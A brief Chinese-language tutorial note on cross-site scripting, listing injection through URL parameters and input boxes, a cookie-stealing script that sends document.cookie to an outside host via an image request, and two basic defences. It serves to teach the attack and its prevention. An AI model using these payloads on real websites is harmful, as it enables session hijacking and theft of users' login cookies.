是什么
跨網站指令碼,將程序惡意注入到網頁上,是網頁使用產生影響
如何攻擊
1,通過鏈接注入
<!-- http://www.domain.com?name=<script>alert(1)</script> --> <div>{{name}}</div>
這就會導致頁面執行了alert(1)的代碼
2,通過輸入框保存信息
<input v-model="username"> //在輸入框打入<script>alert(1)</script> 無論是直接顯示還是保存到服務器都會影響使用
3,劫持cookie,上述方法植入代碼,劫持cookie
<script>
new Image().src =
"http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);
</script>
怎么防
1,對輸入框,url等來源獲取的參數進行過濾,過濾掉尖括號等關鍵字符
2,禁止js訪問cookie